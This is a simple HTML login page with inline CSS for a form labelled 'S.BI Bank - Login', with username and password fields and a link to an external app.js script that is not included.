<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        .maincontainer {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            margin-top: 4%;
        }

        .loginscreen {
            border: 1px solid black;
            height: 400px;
            width: 350px;
            background-color: aqua;
        }

        .inputs {
            margin-top: 10%;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            gap: 20px;
        }

        input {
            padding: 10px;
            border-radius: 10px;
        }

        button {
            padding: 15px;
            height: 45px;
            width: 100px;
            border-radius: 10px;
            color: #fff;
            background-color: black;
            font-weight: bold;
        }

        h1 {
            text-align: center;
            font-family: Georgia, 'Times New Roman', Times, serif;
        }
    </style>
</head>

<body>
    <div class="maincontainer">
        <div class="loginscreen">
            <form id="loginForm">
                <h1>S.BI Bank - Login</h1>
                <hr>
                <div class="inputs">
                    <input type="text" id="username" name="username" placeholder="Enter User Name"
                        autocomplete="username">
                    <input type="password" id="password" name="password" placeholder="Enter Password"
                        autocomplete="new-password">
                    <button type="submit">Log In</button>
                </div>
            </form>
        </div>
    </div>
    <script src="./app.js"></script>
</body>

</html>